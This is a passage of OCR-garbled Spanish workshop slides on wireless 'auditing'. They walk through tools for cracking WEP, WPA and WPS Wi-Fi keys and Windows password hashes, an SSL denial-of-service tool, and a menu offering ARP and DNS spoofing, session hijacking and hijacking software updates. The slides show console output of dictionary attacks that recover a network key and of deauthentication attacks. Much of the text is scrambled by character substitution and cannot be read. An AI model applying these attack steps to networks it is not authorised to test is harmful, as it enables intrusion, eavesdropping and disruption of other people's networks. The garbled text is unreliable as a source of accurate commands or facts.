  continuación) instale + 7abilite las tablas Bista ree .inalmente instalar + 7abilitar las otras tablas de arco iris K% 5ue pueda tener 8 K% ) K% especiales alemán 9 + Bista 8 Bista especial ) Bista num) Bistanueve) Bista + oc7o9 .>rdenar las tablas del arco iris con la lec7as arriba + abajo de la siguienteordenprimero el K% ree) Bista ree) K% especial) Bista especial) el Bista num6rico )K% alemán) el Bista nueve + ) inalmente) Bista oc7o .

171

Page 172: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 172/260

'i 5uieres romper N1 7as7es tal como se encuentra en $indows Bista por deecto 8 la columna de la ", 7as7 siempre está vac2a en la ventanaprincipal op7crac/ 9 )primero instalar + 7abilitar las tablas libres Bista establecidos .

continuación) instale + active cada otras tablas de Bista 5ue usted puedatener . !esactivar todos los otros juegos de tablas K% ) +a 5ue son in:tiles +ralenti3ar el proceso de cra5ueo .>rdenar las tablas Rainbow 7abilitados con la lec7as arriba + abajo de lasiguiente manera primero la vista gratis + luego el Bista especial ) elnum6rico Bista) Bista las nueve + inalmente la Bista oc7o'i 5uieres romper una me3cla de ", + N1 7abilitado 7as7es 8 algunascuentas tienen su columna ", vac2o ) otros tienen tanto la ", + N1 columnasllenas de 7as7es 9 procederá del mismo modo 5ue @ 'i 5uieres romper 7as7es ", 7abilitado @ .

=uinto pa!o aga clic en el botón de la crac/ para iniciar el proceso de cra5ueo . &stedverá el progreso del proceso de cra5ueo en los cuadros ineriores de laventana op7crac/ .Cuando se encuentra una contrasea) 6ste se mostrará en el campo N1 %wd.

  continuación) podemos guardar los resultados de una sesión de crac/ingpulsando el botón *uardar.

thc!!ldo!Esta 7erramienta e#plota una vulnerabit+ en ''" para reali3ar un ata5ue dedenegación de servicio 8!>'9.!eja uera de servicio a un servidor de Internet al agotar la energ2a de suC%&.

 l iniciar nos aparecen las opciones

 TTTTTTTTTTTTTT TTT TTTTTTTTTTT TTT? T TTT

? k ? ? Y ? TTTTTTTT TTTT ? TTTTTT ?

? ?7ttp??www.t7c.org 

1witter f7ac/ersc7oice

*reeting3 t7e renc7 underground

172

Page 173: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 173/260

.?t7c-ssl-dos _options` ]ip^ ]port^-7 7elp-l ]n^ "imit parallel connections _deault 400`

.i$i!la' Documentation

Acerca de .i$i!la'

Inormacion de sistema

9 Bersion de wiisla# wiisla# 4.;9 'istema basado en 'lac/ware =4.=9 ernel D.=D.0-wiisla#9 r5uitectura de sistema i;

9 !esarrollo www.seguridadwireless.net 

Manual B%!ico de .i$i!la'Nos e#plica como se usan algunas de las 7erramientas de $iisla#.

Tutorial Grampu! Beta1utorial de la 7erramienta de analisis de metadatos *rampus.

.irele!!erramientas de auditoria wireless

Air!torm erramienta para reali3ar distintos ata5ues de !enegación de servicio 8!>'9a redes wii[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

 TTTTTirstorm script or ,!D v.ATTTTTT TTTTTTT !eveloped or (ac/1rac/ TTTTTTT

[[[[[[[[[[[[ INI' I,P [[[[[[[[[[[[[[[[[[[[[[[Interace selection[[[[[[[[[

 TTTTTT'elect +our interaceTTTTTT

=9 et70<9 wlan0D9 mon0S

173

Page 174: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 174/260

Page 175: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 175/260

'elecionamos el ap objetivo

'elecionamos dvance mode + se nos abrira una ventana como esta.

175

Page 176: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 176/260

 "e damos a Capturea/e aut7 8b+ orce9'e nos abre otra ventana. "e damos a ccess to inormation + luego a start.

Reles7 client list'elecionamos un cliente"e damos a R% repla+'e abre la ventana de airodump + empe3aran a aumentar los datas

&na ve3 7a+a bastantes le damos a start crac/Ejecutara aircrac/ en una nueva ventana + nos dará la clave. 

176

Page 177: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 177/260

/ern .i$i Crac7ererramienta para crac/ear redes wii con clave wep + wpa.%rimero selecionamos la interace 8wlan0 en nuestro caso9 para ponerla enmodo monitor.

"uego le damos a 'can para escanear las redes&na ve3 escaneadas nos aparecera las redes con wep + wpa detectadascomo podemos ver a5ui

En nuestro caso nos detecto varias redes con wep + wpa 7ora pulsamos sobre $% nos abrira otra ventana donde podemos ver lasredes con wpa + podremos 7acer los ata5ues como podemos ver a5ui

177

Page 178: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 178/260

'elecionamos el ata5ue 5ue 5ueremosRegular o $%' + le damos al botón $ii ttac/'iempre 5ue 7a+a redes con $%' activado siempre es recomendable esteata5ue por5ue sera mas rápido obtener la clave.'i le damos a 1oolbo#%odemos ver otras 7erramientas como

178

Page 179: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 179/260

*eolocator+ 1rac/ereramienta para geolocali3ar puntos de aceso usando su mac o insertarlosen la base de datos.

179

Page 180: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 180/260

Page 181: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 181/260

Ra+ usionerramientas para 7acer ata5ues de uer3a bruta usando dicionarios enservidores con login + servicios 7ttp?7ttps) telnet) o tp

/ran7enScripterramienta para crac/ear redes wii con wps) wpa?wpa< o wep.

 l iniciarlo nos da las siguientes opciones ran/en'cript _=` $ii dapter 'election _<` Enable ttac/ >r Networ/ing ,ode _D` ttac/ $%' Enabled ccess %oint _4` Capture $%?$%< ands7a/e _A` $E% ttac/s _` ttac/ ands7a/e.cap iles _M` '7ow Recovered %ass/e+s _;` Recovered %ass/e+ C7ec/er

181

Page 182: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 182/260

C7osen Interace'+stem ,ode Networ/ing ,ode Enabled,C address or mon0

%lease c7oose an optionSBamos eligiendo cada una de ellas en uncion de lo 5ue 5ueramos 7acer.

G9!cript'cript para crac/ear redes wii.

 l abrirlo pondra nuestra interace en modo monitor automaticamente +empe3ara a escanear los puntos de acceso.VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY P:?scrit 3.4-beta5 b, P:?lms Y

ZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[;istribuci\n de linu detectada* $isla

 aretas $i&i dis!nibles*

/] %/R&^ ;R%)R &KR%/ WW WWWWWWWW WWWWWW WWWWWWWWWW1= (lan0 ath9k Buanta Micr!s,stemsC %/.

\l! se ha detectad! una tareta $i&i* (lan0

Res!luci\n de antalla actual* 1366768

%niciand! la tareta $i&i...

Reiniciand! la inter"aA (lan0 Hath9k=...

ctivand! m!d! m!nit!r en (lan0 H00*17*4*;3*90*54=...

%/R&^ %+ ;R%)R WWWWWWWW WWWWWWW WWWWWW(lan0 ther!s R9280 ath9k H%);: en m!n0=

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY YY + :/R:Q +R ;/R YY K_B; ? %:/R YY / ; R; ;; YY YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

+ara arar el escane! ulsam!s trlQ

182

Page 183: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 183/260

e !s abrira una ventana ara seleci!nar el !betiv!.

/] M / %) ` %+: $+ /:MKR ; R; WW WWWWWWWWWWWWWWWWW WWWWW WW WWWWW WWWW WWW

1=< 98*&5*37*7;*4*66 6 - 11 $+ m!vistar66

2=< 0*4*00*76*74*61 2 - 11 $+2 ^^-$M3= 8*0*3*2K*12*71 11 - 11 $+ % $/2254= 62*6K*;3*6*86*00 10 - 12 $+ %< v!da"!ne86025= 8*0*3*25**KK 6 - 12 $+ % $/KK6= 8*0*3*27*7*93 6 - 12 $+ % $/7937= 00*24*6*K*8*0 6 - 13 $+2 T :culta D8= 9*80*;&*0;*5*1K 11 11 13 $+2 % :ran#e-5199= 00*24*6*K*8*2 6 - 14 $+2 $/060

10= 08*7*4*6*65*K 7 - 14 L$+ 2014 $%&%11= 68*K6*&*0*4;*8 8 - 14 $+2 %L 12= &8*1K*&*62*7*37 11 - 14 $+ % M:)%R7213= 4*1*46*71*56*9 11 - 15 $+ % )!da"!ne56814= 8*94*&6*4K*79*20 9 - 19 $+2 % :&%+15= 38*72*0*9*&1*7 1 - 20 L$+ ^^&1716= 90*&6*52*20*4&*79 1 - 20 $+ ^^&1717=< 0*91*53*24*9*;K 1 19 24 L$+ $/3;18= 64*66*K3*;;*78*2 1 - 24 $+2 +-%/;;78219= 72*0*6&*43*0*70 6 - 25 $+ %< v!da"!ne07020=< 62*96*K&*6;*7*4 1 1 28 $+ v!da"!ne7421=< &8*8*85*88*15*;K 11 3 28 $+ ^^15;;22= K*14*01*KK*;5*;8 11 - 35 $+2 % Ri!+euen!

elecci!na una red de la lista* 17

R M / WWWWWWWWWWWWW

%/R&^*/!mbre..........* (lan0M!d! m!nit!r....* m!n0M.............* 00*17*4*;3*90*54&abricante......* Buanta Micr!s,stemsC %/.

+/: ; :*/!mbre..........* $/3;M.............* 0*91*53*24*9*;Kanal...........* 1ncritaci\n....* $+&abricante......* )i echn!l!#ies !r.

VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY P:?scrit$+ 3.4-beta5 b, P:?lms Y

ZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[

183

Page 184: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 184/260

serand! a ue se #enere el archiv! .)...

serand! a tener sucientes <;ata...

Red $/ detectada...

reand! dicci!nari!...FQN Penerand! cher! de claves* .'(e'dicci!nari!FQN &icher! #uardad! :

%niciand! K_B; ; :/R`...

%niciand! bsueda de c!ntrasea c!n dicci!nari!...

fff :/R` /:/R; OOO

errand! l!s r!ces!s abiert!s...

.'#!,scrit$+* lEnea 1216* 14340 erminad! ataue4

.'#!,scrit$+* lEnea 1216* 14341 erminad! ataue32

.'#!,scrit$+* lEnea 1216* 14342 erminad! ataue5

a c!ntrasea ara la red $/3; es*n headecimal...* 58453039313533323438383344n %%.........* 0000000000; He sustitu,er!n t!d!s l!s nmer!s de laclave real !r cer!s=

e ha cread! el archiv! g$/3; H0-91-53-24-9-;K=.ttgen el direct!ri! gclavesgC el cual c!ntiene la c!ntraseaen "!rmat! headecimal , %% resectivamente.

a herramienta #uarda las claves en el direct!ri! '!t'$ireless-

e,s'P!,lms-ke,s' ambien se uede acceder directamente desde el link del escrit!ri!g$ireless-ke,sg

;uraci\n del r!ces!...* 11 se#und!s

IBuieres c!nectarte a la red g$/3;gJ F'/N*

e#n el ti! de clave ue ten#a el !betiv! eecutara un ataue u !tr!.i el !betiv! tiene $+ c!n (s activad! n!s dara estas d!s !ci!nes*

1=sar P:?scrit $+

184

Page 185: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 185/260

Page 186: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 186/260

Grim#epaerramienta para atacar redes con claves wep + wpa.

 l abrirlo nos preguntara 5ue interace 5ueremos poner en modo monitor 8wlan0 en nuetro caso9

"a selecionamos + le damos a ol."uego en canales marcamos ll C7annels si 5ueremos escanear todos loscanales"e damos a reres7 targets + nos apareceran las redes cercanas escaneadas'elecionamos la red objetivo + abajo el ata5ue

Gemini!Auditorerramienta para atacar redes con claves wep + wpa.

 l iniciar la 7erramienta nos aparecen las opciones disponibles  ' H= H= ' H= ' '' @ j @ ' '' ' j ' @

' ' ' ' H H= ' '' 'CC'

----------------------------------------------------------------------

186

Page 187: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 187/260

  K, #eminisdem!n )ersi\n scrit* 0.7 )ersi\n ;K* 26022014---------------------------------------------------------------------- scanear en busca de !betiv!s tacar !betiv! selecci!nad! elecci!nar !tr! !betiv!

!n#urar ar>metr!s :tras utilidades alir

6i!meterramienta para scanear + capturar datos de redes wiiCuando lo abrimos primero 5ue nos aparece es una advertencia de si vemosel te#to gris + otra de 5ue lo estamos ejecuntando como root."e damos a todas a o/.Nos aparecera otra ventana para 5ue lancemos el servidor ismet) le damosa 'tart."uego ponemos las opciones 5ue 5ueramos + le damos a 'tartNos abre un aviso preguntando si 5ueremos aadir un interace de captura.%reviamente debemos poner nuestra interace en modo monitor abriendo elterminal + poniendoairmon-ng start wlan0con lo 5ue creara la interace en modo monitor mon0%onemos los datos de la interace de captura 8mon0 + el nombre 5ue le5ueramos dar9 + le damos a dd.

'e iniciara el servidor /ismet + empe3ara a escanear las redes cercanasismet erver !ns!le--op m!nit!r m!de va n! matter (hatC use the "!rcevaGtrue s!urce !ti!n ppp%/&:* tarted s!urce @m!n0@ ppp%/&:* ;etected ne( mana#ed net(!rk gren"e (i gC K%; 5*0*5K*30*;*93C ppp encr,ti!n ,esC channel 3C 54.00 mbit ppp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 9*3*&*K*;6*34C ppp encr,ti!n n!C channel 0C 54.00 mbit ppp%/&:* ;etected ne( mana#ed net(!rk g$/95gC K%; 74*88*8K*3*9*5;C ppp encr,ti!n ,esC channel 6C 54.00 mbit ppp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 98*03*;8*75*37*8C ppp encr,ti!n n!C channel 0C 54.00 mbit ppp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 80*94*K5*6;*2&*6C pp

p encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk g^^(igC K%; K8*7*5;*60*K*21Cp encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 30*85*9*&9*85*8;Cp encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 8*;*2;*56*&5*40Cp encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 64*7*69*85*78*8Cp encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 34*31*11*3&*79*8Cp encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 0*4*53*5*&3*&7Cp encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 78*92*9*8*72*18Cp encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 2*4*53*5*&3*&7C

187

Page 188: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 188/260

p encr,ti!n n!C channel 0C 54.00 mbitp%/&:* ;etected ne( r!be net(!rk gTn,DgC K%; 48*74*6*7*86*27Cp encr,ti!n n!C channel 0C 54.00 mbitpp F ill erver N F l!se !ns!le $ind!( Nq

Spoon#ep*erramienta para crac/ear claves wep.

 l iniciarlo arriba vemos distintas pestaas.Bamos a ver como usar cada una de ellas'poonwep settings1enemos 5ue selecionar nuestra tarjeta de red) driver + modo."o 7acemos tal + como se muestra en la siguiente imagen

+ le damos a Ne#tBictims

!iscover+

188

Page 189: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 189/260

en la 5ue veremos los puntos de acceso.'elecionamos el 5ue 5ueramos + le damos a 'election o/

 ttac/ panel 5ui selecionamos el ata5ue 5ue 5ueremos 7acer.elp?ints

%estaa de a+uda + consejos.

.i$i Metropoli! erramienta para crac/ear claves wep + wpa&na ve3 abierta en la pestaa conig ponemos$ii card interace wii) wlan0 en nuetro casoa/e ,ac le damos a enable para activar una mac alsa,onitor le damos a enable para activar modo monitor

189

Page 190: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 190/260

Bamos a la pestaa 'canner le damos a ll + empe3ara a capturar todas losdispositivos wii 8ap + clientes9"e damos a Ctrlhc para parar el escaneo.

$epNos apareceran los distintos ata5ue disponibles

190

Page 191: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 191/260

$paNos apareceran los distintos ata5ue disponibles

>t7erNos dara opción de otros ata5ues como por ejemplo$ps

191

Page 192: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 192/260

.i$i Eererramienta para crac/ear claves wii) reali3ar ata5ues ,I1, + otros.

 l iniciarlo nos aparecen distintos menus para selecionar las opciones

$i-",eversi!n* 0.5.7% can ,!u OO$ritten b, ^aid l-Buraishi H%P=

AaidUisecur1t,.!r# (i-"e,e.Aa1d.c!m 

/et(!rk inter"aces*1. (lan0

elect ,!ur net(!rk inter"ace

(i-",e DD 1

Main menus*

1. rackin#

2. M%M HMan in the Middle=3. :thers0. it

1. rackin#$i-",e DD 1FQN nablin# m!nit!r m!de !n (lan0...FQN M!nit!r m!de enabled !n m!n0

1. )ie( availabe (ireless net(!rks2. aunch ir!dum-n# !n a secec +3. $+ rackin#4. $+ rackin#0. Kack

192

Page 193: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 193/260

$i-",e DD rackin# DD 1

FQNcannin# "!r net(!rks...

< K%; hannel nc %;

2. M%M HMan in the Middle=$i-",e DD 2

1. nable %+ "!r(ardin#.2. can "!r c!nnected devices.3. aunch etterca Het m!de=.4. R+ s!!".5. ut internet c!nnecti!n.6. ni '+ traSc.7. ni Rs and send them t! br!(ser.8. ni %ma#es.9. ;/ !!".

10. + essi!n iackin# Husin# amster=.0. Kack

3. :thers$i-",e DD 31. han#e M ddress2. Make a "ake access !int3. iack s!"t(are udates Hs necesari! estar c!nectad! a una red=0. Kack

.i/ite*erramienta automatica para reali3ar auditorias wii.

 l iniciar la 7erramienta podemos ver lo siguiente

.@ jC.@ C@ jC jC $i&ite v2 Hr86=

.@ C@ C@ jC jC jC** ** * H = * ** ** aut!mated (ireless audit!r@*. @*. @*. ' C*@ C*@ C*@@*. @*. ' C*@ C*@ desi#ned "!r inu@*. ' C*@

'

FQN tar#et M address vie(in# enabled

FQN scannin# "!r (ireless devices...FQN initialiAin# scan Hm!n0=C udates at 5 sec intervalsC RQ (hen read,.

 F0*00*22N scannin# (ireless net(!rks. 13 tar#et and 1 client "!undFQN checkin# "!r $+ c!matibilit,... d!neFQN scannin# Hm!n0=C udates at 5 sec intervalsC RQ (hen read,.

/M %; K%; /R +:$R $+J %/--- -------------------- ----------------- -- ---- ----- ---- ------

193

Page 194: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 194/260

  1 h!m;011639 00*24*;1*9*1*42 6 $+2 19db n!2 +!rtable !ts!t 0*&4*50*55*4*KK 7 $+2 16db n! client3 $/41K8 ;0***;&*41*K8 6 $+ 15db (s4 &-2778 K*76*70*&4*27*7& 1 $+ 15db (s5 $/6 0*91*53*58*9*K 10 $+ 13db n!

6 Ten#th 1D 00*23*68*13*6*;0 1 $+2 12db n!7 l!rbert! K*14*01*92*K3*08 1 $+2 12db (s8 $/9K40 8*6*87*4;*9K*41 7 $+ 12db n!9 M:)%R8K10 &8*63*94*02*8K*19 2 $+ 12db (s

10 Ramala 00*24*;1*8*K9*3; 11 $+ 12db n!11 $/&074 ;0***8*&0*74 1 $+ 12db (s12 /%R: 1 ;0***8*&1*7 6 $+ 11db (s13 (imediaR-2112 68*K6*&*0*4*;8 3 $+2 11db (s

FQN select tar#et numbers H1-13= searated b, c!mmasC !r @all@* 2

FQN 1 tar#et selected.

F0*08*20N startin# (a handshake cature !n g +!rtable !ts!tgF0*07*50N sendin# 5 deauth t! 8*70*5*50*7*98...

Bamos a e#plicar a7ora lo 5ue 7ace la 7erramienta%rimero pone la tarjeta en modo monitor + empie3a a escanear los puntos deaccesos.&na ve3 capture las redes 5ue 5ueremos atacar le damos a CtrlhC paraparar el escaneo.'elecionamos la red objetivo e iniciara el ata5ue $ep) wpa o wps seguncada caso.Captura

Aircrac7ng+M;guiInterace gráica de la amosa suite aircrac/ para crac/eo de claves wii."o primero 5ue tenemos 5ue 7acer es ir a ,enu - airmon-nginterace wlan0%ulsar el botón Enable mode monitor

>/

194

Page 195: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 195/260

 7ora vamos a e#plicar el contenido de cada pestaa,ain logEn la prime pestaa podemos ver el log de todas las actividades delprograma.

 irodump

 5ui podemos ver las distintas opciones para atacar las redes wii.%rimero selecionamos nuestra interace monitor 8mon09 + le damos a startIniciara airodump + apareceran los puntos de acceso + clientes wiii cercanos

abajo.

195

Page 196: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 196/260

&na ve3 selecionemos el % objetivo le damos a capture + empe3ara acapturar data e ivs"uego en las pestaas wep o wpa podemos selecionar el ata5ue 5ue5ueramos llevar a cabo.

En el resto de pestaa podemos ver los logs de cada ata5ue.a/e ut7

a/e !eaut7

196

Page 197: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 197/260

(roadcast

 R% Reinjection

197

Page 198: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 198/260

ragmentation

C7opC7op

198

Page 199: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 199/260

 ircrac/

Reaver 8$%-$%'9

199

Page 200: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 200/260

istorical Networ/

elp%odemos ver la inormación sobre Qt) sobre el programa + sobre aircrac/.

200

Page 201: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 201/260

Minid#epgt7erramienta con interace gráica 8*&I9 basada en la siute ircrac/-ng. Conesta gui podremos auditar) tanto redes con cirado wep) como redes concirado wpa) incluso podremos usar reaver para redes con wps activado

'elecionamos$irelles Cards wlan0C7annel llEncr+ption selecionamos $ep o $pa?wpa'i selecionamos $pa?wpa<"e damos a scan + nos escaneara redes con encriptación wpa"e damos a Ctrlhc para parar el escaneo.'i la red wpa con wps activado le damos a reaver.'i no le damos a dictionar+ attac/ para selecionar un diccionario + reali3ar unata5ue de uer3a bruta.

'i selecionamos wep en,ode selected selecionamos los ata5ues 5ue 5ueramosInjection rate A00 8tasa de injección de pa5uetes por segundo9"e damos a 'can + empe3ara a escanear las redes wii cercanas.Cuando 5ueramos parar el escaneo le damos a CtrlhC + apareceran lasredes en el programa%ara lan3ar los ata5ues le damos a "anc7 + comen3ara a reali3ar los

ata5ues de aircrac/-ng 5ue selecionamos previamente en mode selected.

201

Page 202: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 202/260

&na ve3 se consiguan los ivs suicientes se ejecutara automaticamenteaircrac/-ng + nos aparecera la clave.

.4A

erramientas para crac/ear redes con encriptación $%.Airlinerramienta para recuperación de contraseas $%?$%<

 irlin es un probador de claves contenidas en un diccionario de te#to plano)5ue lo 5ue 7ace es coger una a una cada clave del diccionario + validarlacontra el ap) por lo 5ue no necesita 7ands7a/e) pero necesita estar onlinecon el ap) si la clave no es correcta) el ap dice 5ue es mala + el script pasa ala siguiente) si la clave es buena) el ap le contesta con autentiicación o/) +entonces el script se detiene + muestra la clave en pantalla.

No necesitamos montar la interace en modo monitor +a 5ue lo 5ue 7ace elscript básicamente es intentar conectarse al % con todas + cada una de lasclaves 5ue tengamos en el diccionario 8previamente creado9

Bamos a ver a continuación como unciona<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< << irlin << b, $arcr, << <

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< irlin es una herramienta de recueraci\n de c!ntraseas $+'$+2

+ara la recueraci\n de c!ntraseas $+ uedes usar $lanreaver

/! se muestran inter"aces en m!d! m!nit!r Hc!m! m!n0=.irlin n! l!s utiliAa.

elecci!na el nmer! de dis!sitiv! $i&i ue uieres utiliAar*

F0N (lan0

as selecci!nad!* (lan0 esera....

elecci\n de ssid Hn!mbre de la red a la ue uieres c!nectarte=

eeml!* $/1&4

fff Recuerda ue tienes ue hacer c!incidir el n!mbre c!mlet!resetand! l!s #ui!nesC ma,sculas , minsculas OOO

202

Page 203: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 203/260

 eclea el ssid$/1&4

elecci\n del dicci!nari!*

i estas utiliAand! $isla , tenem!s el dicci!nari! en elescrit!ri!C la ruta seria*

eeml!* 'r!!t';eskt!'dicci!nari!.tt

fff Recuerda ue tienes ue resetar las ma,sculas , minsculasde la ruta ! te dir> ue el archiv! n! eisteCtambin tienes ue resetar el n!mbre del dicci!nari! c!n suetensi\nC en el eeml! es* dicci!nari!.tt OOO

 eclea la ruta del dicci!nari!'r!!t';eskt!'dicci!nari!.tt

&na ve3 puesta la ruta del diccionario la 7erramienta empe3ara usar elcontenido del diccionario para intentar recuperar la clave $%

Autoh!gui erramienta con interace gráica 8*&I9 para capturar 7ands7a/es de redescon $%.

 ntes de iniciar la 7erramienta debemos poner la tarjeta en modo monitor 

8sino nos saltara una ventana con un aviso9%odemos 7acerlo abriendo el terminal + poniendoairmon-ng start wlan0

 brimos a7ora la aplicación

En la pestaa settings ponemosCard mon0 8la interace en modo monitor9

(''I! ,ac del punto de acceso objetivo

203

Page 204: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 204/260

Page 205: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 205/260

 D9 Relaunc7 ttac/

(&*' '&(,I''I>N

You can submit a bug or eac7 o m+ projects 7ere7ttp??code.google.com?p?svtool3?issues?listScan[=W5[

Brutu!1ac7erramienta para reali3ar ata5ues de dicionario a los 7ands7a/es capturados+ obtener la clave $%.%ara 5ue el programa uncione primero tenemos 5ue copiar el 7ands7a/ecapturado a la carpeta (rutus?opt?(rutus?

'i no nos dara este mensaje de errors7 ?opt?(rutus?(rutusac/ Error de entrada?salida

En esta 7erramienta tenemos varios modelos de diccionario preconcebidos)para distintas redes o distintos tipos de diccionarios) por ejemplo todos los!NI o todos lo tel6onos.

En el men: podemos ver 5u6 tipos de diccionarios 7a+ preconcebidos) paraalgunos router o los 5ue podemos crear.&na ve3 5ue seleccionamos nuestra opción) nos pedirá (''i! + E''I!)cuando lo pongamos) no pide elegir la orma de pasar el diccionario o sipreerimos guardarlo.

Elegimos aircrac/ 8en nuestro caso 9 + comien3a a pasar el diccionario.

chapcrac7+p'cript programado en p+t7on para desencriptar los 7ands7a/es capturados."as opciones 5ue tiene son

!mmands Huse gchacrack., hel Tc!mmandDg t! see m!re=*

arse -i TcatureDradius - Tchallen#eD -R Tres!nseDdecr,t -i TcatureD -! Tdecr,tedcatureD -n TnthashDhel Tc!mmandD

Co#patterramienta para reali3ar ata5ues de dicionario para obtener la clave $%."as distintas opciones del programa sonc!(att,* Must sul, a ca le (ith -rsa#e* c!(att, F!ti!nsN

-" ;icti!nar, le205

Page 206: Taller de Seguridad Inalambrica.pdf

